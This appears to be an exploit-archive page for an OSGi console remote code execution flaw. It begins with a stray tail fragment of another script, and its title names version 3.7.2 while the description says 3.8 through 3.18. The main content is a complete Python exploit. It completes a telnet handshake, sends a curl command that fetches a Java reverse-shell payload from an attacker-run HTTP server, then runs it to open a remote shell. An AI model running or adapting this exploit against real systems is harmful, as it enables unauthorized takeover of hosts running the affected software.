deliver_payload(args.rhost, args.rport, payload)    if success:        print("(+) Done.")    else:        print("(-) Finished with errors.")if __name__ == "__main__":    main(parse())

OSGi 3.7.2 Remote Code Execution

OSGi versions 3.8 through 3.18 suffer from a remote code execution vulnerability.

    #!/usr/bin/python# Exploit Title: [OSGi v3.8-3.18 Console RCE]# Date: [2023-07-28]# Exploit Author: [Andrzej Olchawa, Milenko Starcik,#                  VisionSpace Technologies GmbH]# Exploit Repository:#           [https://github.com/visionspacetec/offsec-osgi-exploits.git]# Vendor Homepage: [https://eclipse.dev/equinox]# Software Link: [https://archive.eclipse.org/equinox/]# Version: [3.8 - 3.18]# Tested on: [Linux kali 6.3.0-kali1-amd64]# License: [MIT]## Usage:# python exploit.py --help## Example:# python exploit.py --rhost=192.168.0.133 --rport=1337 --lhost=192.168.0.100 \#                                                      --lport=4444"""This is an exploit that allows to open a reverse shell connection fromthe system running OSGi v3.8-3.18 and earlier."""import argparseimport socketimport sysimport threadingfrom functools import partialfrom http.server import BaseHTTPRequestHandler, HTTPServer# Stage 1 of the handshake messageHANDSHAKE_STAGE_1 = \    b"\xff\xfd\x01\xff\xfd" \    b"\x03\xff\xfb\x1f\xff" \    b"\xfa\x1f\x00\x74\x00" \    b"\x37\xff\xf0\xff\xfb" \    b"\x18"# Stage 2 of the handshake messageHANDSHAKE_STAGE_2 = \    b"\xff\xfa\x18\x00\x58" \    b"\x54\x45\x52\x4d\x2d" \    b"\x32\x35\x36\x43\x4f" \    b"\x4c\x4f\x52\xff\xf0"# The buffer of this size is enough to handle the telnet handshakeBUFFER_SIZE = 2 * 1024class HandlerClass(BaseHTTPRequestHandler):    """    This class overrides the BaseHTTPRequestHandler. It provides a specific    functionality used to deliver a payload to the target host.    """    _lhost: str    _lport: int    def __init__(self, lhost, lport, *args, **kwargs):        self._lhost = lhost        self._lport = lport        super().__init__(*args, **kwargs)    def _set_response(self):        self.send_response(200)        self.send_header("Content-type", "text/html")        self.end_headers()    def do_GET(self):  # pylint: disable=C0103        """        This method is responsible for the playload delivery.        """        print("Delivering the payload...")        self._set_response()        self.wfile.write(generate_revshell_payload(            self._lhost, self._lport).encode('utf-8'))        raise KeyboardInterrupt    def log_message(self, format, *args):  # pylint: disable=W0622        """        This method redefines a built-in method to suppress        BaseHTTPRequestHandler log messages.        """        returndef generate_revshell_payload(lhost, lport):    """    This function generates the Revershe Shell payload that will    be executed on the target host.    """    payload = \        "import java.io.IOException;import java.io.InputStream;" \        "import java.io.OutputStream;import java.net.Socket;" \        "class RevShell {public static void main(String[] args) " \        "throws Exception { String host=\"%s\";int port=%d;" \        "String cmd=\"sh\";Process p=new ProcessBuilder(cmd)." \        "redirectErrorStream(true).start();Socket s=new Socket(host,port);" \        "InputStream pi=p.getInputStream(),pe=p.getErrorStream(), " \        "si=s.getInputStream();OutputStream po=p.getOutputStream()," \        "so=s.getOutputStream();while(!s.isClosed()){while(pi.available()" \        ">0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());" \        "while(si.available()>0)po.write(si.read());so.flush();po.flush();" \        "Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};" \        "p.destroy();s.close();}}\n" % (            lhost, lport)    return payloaddef run_payload_delivery(lhost, lport):    """    This function is responsible for payload delivery.    """    print("Setting up the HTTP server for payload delivery...")    handler_class = partial(HandlerClass, lhost, lport)    server_address = ('', 80)    httpd = HTTPServer(server_address, handler_class)    try:        print("[+] HTTP server is running.")        httpd.serve_forever()    except KeyboardInterrupt:        print("[+] Payload delivered.")    except Exception as err:  # pylint: disable=broad-except        print("[-] Failed payload delivery!")        print(err)    finally:        httpd.server_close()def generate_stage_1(lhost):    """    This function generates the stage 1 of the payload.    """    stage_1 = b"fork \"curl http://%s -o ./RevShell.java\"\n" % (        lhost.encode()    )    return stage_1def generate_stage_2():    """    This function generates the stage 2 of the payload.    """    stage_2 = b"fork \"java ./RevShell.java\"\n"    return stage_2def establish_connection(rhost, rport):    """    This function creates a socket and establishes the connection    to the target host.    """    print("[*] Connecting to OSGi Console...")    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    sock.connect((rhost, rport))    print("[+] Connected.")    return sockdef process_handshake(sock):    """    This function process the handshake with the target host.    """    print("[*] Processing the handshake...")    sock.recv(BUFFER_SIZE)    sock.send(HANDSHAKE_STAGE_1)    sock.recv(BUFFER_SIZE)    sock.send(HANDSHAKE_STAGE_2)    sock.recv(BUFFER_SIZE)    sock.recv(BUFFER_SIZE)def deliver_payload(sock, lhost):    """    This function executes the first stage of the exploitation.    It triggers the payload delivery mechanism to the target host.    """    stage_1 = generate_stage_1(lhost)    print("[*] Triggering the payload delivery...")    sock.send(stage_1)    sock.recv(BUFFER_SIZE)    sock.recv(BUFFER_SIZE)def execute_payload(sock):    """    This function executes the second stage of the exploitation.    It sends payload which is responsible for code execution.    """    stage_2 = generate_stage_2()    print("[*] Executing the payload...")    sock.send(stage_2)    sock.recv(BUFFER_SIZE)    sock.recv(BUFFER_SIZE)    print("[+] Payload executed.")def exploit(args, thread):    """    This function sends the multistaged payload to the tareget host.    """    try:        sock = establish_connection(args.rhost, args.rport)        process_handshake(sock)        deliver_payload(sock, args.lhost)        # Join the thread running the HTTP server        # and wait for payload delivery        thread.join()        execute_payload(sock)        sock.close()        print("[+] Done.")    except socket.error as err:        print("[-] Could not connect!")        print(err)        sys.exit()def parse():    """    This fnction is used to parse and return command-line arguments.    """    parser = argparse.ArgumentParser(        prog="OSGi-3.8-console-RCE",        description="This tool will let you open a reverse shell from the "                    "system that is running OSGi with the '-console' "                    "option in versions between 3.8 and 3.18.",        epilog="Happy Hacking! :)",    )    parser.add_argument("--rhost", dest="rhost",                        help="remote host", type=str, required=True)    parser.add_argument("--rport", dest="rport",                        help="remote port", type=int, required=True)    parser.add_argument("--lhost", dest="lhost",                        help="local host", type=str, required=False)    parser.add_argument("--lport", dest="lport",                        help="local port", type=int, required=False)    parser.add_argument("--version", action="version",                        version="%(prog)s 0.1.0")    return parser.parse_args()def main(args):    """    Main fuction.    """    thread = threading.Thread(        target=run_payload_delivery, args=(args.lhost, args.lport))    thread.start()    exploit(args, thread)if __name__ == "__main__":    main(parse())

Tag

#auth